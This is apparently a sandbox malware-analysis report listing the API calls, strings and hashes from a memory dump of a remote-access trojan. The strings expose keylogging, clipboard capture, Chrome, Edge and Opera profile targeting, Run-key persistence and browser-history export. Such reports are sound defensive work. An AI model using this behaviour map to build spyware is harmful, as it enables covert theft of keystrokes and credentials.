                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$SleepText$ForegroundLength
                                                                                                    • String ID: [ $ ]
                                                                                                    • API String ID: 3309952895-93608704
                                                                                                    • Opcode ID: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                                                    • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                                                                                    • Opcode Fuzzy Hash: 50bd45538fc1325d318fbbf77384be1d7cd884a7cd54cef18345d66a056de0e4
                                                                                                    • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                                    • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                                                                                    • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                                                                                    • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                                    • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                                                                                    • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                                                                                    • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                                                                                    APIs
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                                                                                    • GetLastError.KERNEL32(?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,00000000,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 3177248105-0
                                                                                                    • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                                    • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                                                                                    • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                                                                                    • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                                                                                    APIs
                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041A23C
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041A261
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041A26F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                    • String ID:
                                                                                                    • API String ID: 3919263394-0
                                                                                                    • Opcode ID: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                                                    • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                                                                                    • Opcode Fuzzy Hash: 41f32d273eec2ecedf938006867b0e525744eccbc76a9f2796ec39ced93a6363
                                                                                                    • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                                                                                    APIs
                                                                                                    • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                                                                                    • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                                                                                    • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                                                                      • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                                                                                    • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                                    • String ID:
                                                                                                    • API String ID: 1761009282-0
                                                                                                    • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                    • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                                                                                    • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                                                                                    • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                    • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                                    • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                                                                                    • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                                                                                    • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                                                                                    APIs
                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                                                                      • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                                                                                      • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                                                                      • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                                                                      • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                                                                                    • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                                                                                    Strings
                                                                                                    • /sort "Visit Time" /stext ", xrefs: 00404092
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                    • String ID: /sort "Visit Time" /stext "
                                                                                                    • API String ID: 368326130-1573945896
                                                                                                    • Opcode ID: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
                                                                                                    • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                                                                                    • Opcode Fuzzy Hash: d6066f6fedcf8ee7e641328f055e00c8f98f2a4b7a6ad40c7887a3f4e34f155a
                                                                                                    • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                                                                                    APIs
                                                                                                      • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Init_thread_footer__onexit
                                                                                                    • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                    • API String ID: 1881088180-3686566968
                                                                                                    • Opcode ID: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                                                    • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                                                                                    • Opcode Fuzzy Hash: 7103c85559471987959954c794bf5a9939257c7fe470f67ca2388a99a2e131d5
                                                                                                    • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                                                                                    APIs
                                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ACP$OCP
                                                                                                    • API String ID: 0-711371036
                                                                                                    • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                                    • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                                                                                    • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                                                                                    • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                                                                                    APIs
                                                                                                    • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                                                                                    • IsWindowVisible.USER32(?), ref: 00415B37
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$TextVisible
                                                                                                    • String ID: (%G
                                                                                                    • API String ID: 1670992164-3377777310
                                                                                                    • Opcode ID: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                                                    • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                                                                                    • Opcode Fuzzy Hash: c4f1a057548f617f97dac145fe627f2fcfef0d293da89b6e65bebe14462c6ac3
                                                                                                    • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                                                                                    Strings
                                                                                                    • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                    • API String ID: 481472006-507513762
                                                                                                    • Opcode ID: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                                                    • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                                                                                    • Opcode Fuzzy Hash: 38a968fbfb39420bb19cc7190e3be632f606f2fd3d51ef38d5bd9d39a9ed176f
                                                                                                    • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                                                                                    APIs
                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                                                                                    • ___raise_securityfailure.LIBCMT ref: 00432E76
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                    • String ID: (F
                                                                                                    • API String ID: 3761405300-3109638091
                                                                                                    • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                                    • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                                                                                    • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                                                                                    • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                                                                                    APIs
                                                                                                    • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime
                                                                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                                                                    • API String ID: 481472006-2430845779
                                                                                                    • Opcode ID: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                                                    • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                                                                                    • Opcode Fuzzy Hash: 07f86f52f9fe5ad8dc19ba50befdd62a3544993bc388c75ec5461e2102273a9c
                                                                                                    • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExistsFilePath
                                                                                                    • String ID: alarm.wav$x(G
                                                                                                    • API String ID: 1174141254-2413638199
                                                                                                    • Opcode ID: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                                                    • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                                                                                    • Opcode Fuzzy Hash: 35b7fd8c42e8a9877effe4b9b8fa32281001cd31cbef35761c7d7cb37d8788de
                                                                                                    • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                                                                                      • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                                                                                      • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00409FFD
                                                                                                    • UnhookWindowsHookEx.USER32 ref: 0040A010
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                    • String ID: Online Keylogger Stopped
                                                                                                    • API String ID: 1623830855-1496645233
                                                                                                    • Opcode ID: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                                                    • Instruction ID: de94d33b988dbd75262e40483fa5bc1fa77a380ea8b62c1163629748a83ca489
                                                                                                    • Opcode Fuzzy Hash: 95be6b2d5d1265815bc3ce4225fc1cdac552dc75167390ee86932ead681b8db3
                                                                                                    • Instruction Fuzzy Hash: 2601F530A003045BD7257F24C81BBBE7BB59B82304F40056FE541225D2EAB91866E7DF
                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000,?,?,?,?,?,?,0040B5A1), ref: 0040B49A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExistsFilePath
                                                                                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                                                                    • API String ID: 1174141254-2800177040
                                                                                                    • Opcode ID: 7387d163371ebbb72c4240f0df5e61c339b30ecb81db7f64e40eb0c66367c65a
                                                                                                    • Instruction ID: 5821409638838460856efc798fa08f59aead72c028a5ec3eaf808f19191aee33
                                                                                                    • Opcode Fuzzy Hash: 7387d163371ebbb72c4240f0df5e61c339b30ecb81db7f64e40eb0c66367c65a
                                                                                                    • Instruction Fuzzy Hash: CBF0547090021996CA04FBA6CC57DFF7B6CDA10715B40057FBA01721D3EEBC9E5586D9
                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000,?,?,?,?,?,?,0040B53E), ref: 0040B437
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExistsFilePath
                                                                                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                                                                                    • API String ID: 1174141254-4188645398
                                                                                                    • Opcode ID: af5dc609dbafaeadaed538460fe133d5b32e4fb31a1b2d24cbd54e34e2a94a59
                                                                                                    • Instruction ID: 3f8b084fd7c06795b4d0fa8893062b22b44e731770192fac0e06baefb29df0f7
                                                                                                    • Opcode Fuzzy Hash: af5dc609dbafaeadaed538460fe133d5b32e4fb31a1b2d24cbd54e34e2a94a59
                                                                                                    • Instruction Fuzzy Hash: 3DF08970A0021996CA04FBA6DC479FF7B6CDA10715B40007F7A01721D3EEBC9E498ADD
                                                                                                    APIs
                                                                                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000,?,?,?,?,?,?,0040B604), ref: 0040B4FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExistsFilePath
                                                                                                    • String ID: AppData$\Opera Software\Opera Stable\
                                                                                                    • API String ID: 1174141254-1629609700
                                                                                                    • Opcode ID: 53845ebcffcdac5a43e02d27dcf0b383e0c275327feaaf80f8b8ecb8d3e5007f
                                                                                                    • Instruction ID: 52471f63f703214977655dbdffc05bc1b666495b4e4508f2cd1aa44db4b955b6
                                                                                                    • Opcode Fuzzy Hash: 53845ebcffcdac5a43e02d27dcf0b383e0c275327feaaf80f8b8ecb8d3e5007f
                                                                                                    • Instruction Fuzzy Hash: 2AF05430900219A6C604FBA6CC479EF7B6C9A50709B40047FB901722D3EEB99A4586DD
                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000011), ref: 0040A597
                                                                                                      • Part of subcall function 00409468: GetForegroundWindow.USER32(00472008,?,00472008), ref: 0040949C
                                                                                                      • Part of subcall function 00409468: GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                                                                                                      • Part of subcall function 00409468: GetKeyboardLayout.USER32(00000000), ref: 004094AE
                                                                                                      • Part of subcall function 00409468: GetKeyState.USER32(00000010), ref: 004094B8
                                                                                                      • Part of subcall function 00409468: GetKeyboardState.USER32(?), ref: 004094C5
                                                                                                      • Part of subcall function 00409468: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                                                                                                      • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                                    • String ID: [AltL]$[AltR]
                                                                                                    • API String ID: 3195419117-2658077756
                                                                                                    • Opcode ID: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                                                    • Instruction ID: 29e442ca109236f59d068076b5b59df2bd5c1a98fb0e5871b2f0b43888bf59e1
                                                                                                    • Opcode Fuzzy Hash: c7c7ad3f27c2af8ea36dcc5d825e618062cde7260dbebf7789c9b1878f0a465e
                                                                                                    • Instruction Fuzzy Hash: E0E0E52170432026C828363E2D2B6AE39109741761B80006FF8436B2C6EC7E8D1043CF
                                                                                                    APIs
                                                                                                    • GetKeyState.USER32(00000012), ref: 0040A5F1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: State
                                                                                                    • String ID: [CtrlL]$[CtrlR]
                                                                                                    • API String ID: 1649606143-2446555240
                                                                                                    • Opcode ID: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                                                    • Instruction ID: c9b4056729f6320a31326482d9effdd17bd0eb8d0dea22e3f8a852eb4ad5c27f
                                                                                                    • Opcode Fuzzy Hash: 8e7e769867d94fe63cd06e7140cf990a5fd4f428e2263eac50557698d3f8299e
                                                                                                    • Instruction Fuzzy Hash: 53E02672B043112AC414397E551EA2A286087917A9F46042FECC3672C3D87F8D2203CF
                                                                                                    APIs
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,004721E8,80000002,80000002,0040BD02,00000000,?,00472200,pth_unenc,004721E8), ref: 00412422
                                                                                                    • RegDeleteValueW.ADVAPI32(004721E8,?,?,00472200,pth_unenc,004721E8), ref: 00412436
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412420
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeleteOpenValue
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                    • API String ID: 2654517830-1051519024
                                                                                                    • Opcode ID: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                                    • Instruction ID: b623b948bfdfa0337ccefb4abe002260ff2e01b184ebd3416e4b53d264740477
                                                                                                    • Opcode Fuzzy Hash: 45be350e15fffb6ae5252e7309d7a4a092feaea6bf63e3a5136c94c60f555a57
                                                                                                    • Instruction Fuzzy Hash: 9BE0C231244208BBDF108F71DE07FFA372CDB01F01F5042A5BD0592091C666CE149664
                                                                                                    APIs
                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00433064
                                                                                                      • Part of subcall function 00432FCD: std::exception::exception.LIBCONCRT ref: 00432FDA
                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433072
                                                                                                      • Part of subcall function 00436EC6: RaiseException.KERNEL32(?,?,00433057,?,?,?,00000000,?,?,?,P@,00433057,?,0046B09C,00000000), ref: 00436F25
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.3433481659.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_400000_AddInProcess32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                    • String ID: P@
                                                                                                    • API String ID: 1586462112-676759640
                                                                                                    • Opcode ID: d34f057b204cbc7e51539216932af2e5b0516ce62ca17289c65ad8c524a6b4fa
                                                                                                    • Instruction ID: 0bfe0c8ac6dbc9b0d4453f7df384559b02cf33d5589a4338b6e2a72978291aeb
